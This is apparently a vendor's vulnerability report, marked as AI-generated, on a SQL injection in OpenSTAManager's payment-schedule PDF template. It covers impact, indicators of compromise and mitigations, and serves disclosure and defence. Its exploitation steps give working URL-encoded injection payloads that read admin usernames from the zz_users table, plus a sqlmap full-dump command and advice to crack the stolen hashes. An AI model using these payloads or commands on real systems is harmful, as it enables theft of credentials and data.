CVE-2025-69216: 
PHP vulnerability analysis and mitigation

Overview

CVE-2025-69216 is an authenticated SQL injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template, affecting all versions up to and including 2.9.8. The flaw allows any authenticated user — regardless of privilege level — to extract sensitive data from the database, including admin credentials, customer information, and financial records. It was disclosed on February 6, 2026, by researcher Łukasz Rybak via a GitHub Security Advisory. The vulnerability carries a CVSS v3.1 score of 6.5 (Medium) and a CVSS v4.0 score of 8.7 (High) (GitHub Advisory, OSM Advisory).

Technical details

The root cause is CWE-89 (Improper Neutralization of Special Elements used in an SQL Command). In templates/scadenzario/init.php at line 46, the id_anagrafica parameter retrieved via the get() function is directly concatenated into an SQL query string without using the application's prepare() sanitization function or any input validation:

if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

The vulnerable endpoint is /pdfgen.php?ptype=scadenzario&id_anagrafica=[PAYLOAD], accessible via HTTP GET. Similar unsanitized patterns also exist at lines 34 and 40 for date parameters. The injection supports error-based, boolean-based blind, and time-based blind techniques, all confirmed by SQLMap (OSM Advisory).

Impact

Successful exploitation grants complete read access to the OpenSTAManager database, enabling extraction of admin usernames, bcrypt password hashes, email addresses, customer records, and financial data. Any authenticated user — including those with minimal permissions — can escalate their effective data access to administrator level. While the CVSS v3.1 score reflects only confidentiality impact (no integrity or availability loss from the injection itself), the exposure of admin credentials creates a pathway for full application compromise and potential lateral movement (GitHub Advisory, OSM Advisory).

Exploitability

A detailed proof-of-concept (PoC) is publicly available in the GitHub Security Advisory, including specific crafted URLs and SQLMap commands demonstrating error-based, boolean-based blind, and time-based blind injection. The exploit was also indexed by Sploitus. The EPSS score is approximately 0.015% (3rd percentile), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory, OSM Advisory).

Exploitation steps

  1. Authenticate: Obtain any valid user account on the target OpenSTAManager instance (any role is sufficient).
  2. Confirm vulnerability: Send a basic syntax-breaking request to verify the injection point:
    GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20
    A SQL syntax error in the response confirms the vulnerability.
  3. Extract database version using error-based injection with EXTRACTVALUE:
    GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221
  4. Extract database name:
    GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221
  5. Extract admin credentials (username, email, password hash) from the zz_users table:
    GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
  6. Automate full database dump using SQLMap with a saved request file:
    sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs
    Where sqli_osm.req contains the GET request with a valid PHPSESSID session cookie and the id_anagrafica=1* parameter marked for injection.
  7. Leverage extracted credentials: Crack or reuse the obtained bcrypt hashes to escalate access within OpenSTAManager or pivot to other systems if credentials are reused (OSM Advisory).

Indicators of compromise

  • Network: Unusual GET requests to /pdfgen.php with ptype=scadenzario and id_anagrafica values containing SQL keywords (EXTRACTVALUE, CONCAT, SELECT, UNION, SLEEP, AND, --), URL-encoded SQL syntax (%22, %20AND%20, %27), or hex-encoded strings (0x7e).
  • Logs: Web server access logs showing repeated requests to /pdfgen.php?ptype=scadenzario&id_anagrafica= with varying payloads; PHP error logs containing MySQL XPATH syntax errors or EXTRACTVALUE function errors indicating error-based injection attempts.
  • Database: Unusual or high-frequency queries against zz_users, co_scadenziario, or other sensitive tables originating from the web application process; queries containing EXTRACTVALUE, GTID_SUBSET, or SLEEP() functions.
  • Process: Unexpected outbound connections from the web server following exploitation, potentially indicating credential reuse or further lateral movement attempts (OSM Advisory).

Mitigation and workarounds

As of the advisory publication date, no patched version has been officially released — the advisory lists "None" for patched versions, meaning all installations running version 2.9.8 and earlier remain vulnerable. The recommended immediate mitigations are: (1) restrict access to the /pdfgen.php endpoint and the Scadenzario print functionality to trusted users only; (2) implement network-level controls (firewall, VPN) to limit who can reach the OpenSTAManager application; (3) deploy WAF rules to detect and block SQL injection patterns targeting the id_anagrafica parameter; and (4) monitor database and web server logs for anomalous query patterns. Organizations should monitor the OpenSTAManager repository for a patched release and upgrade immediately when available (GitHub Advisory, OSM Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management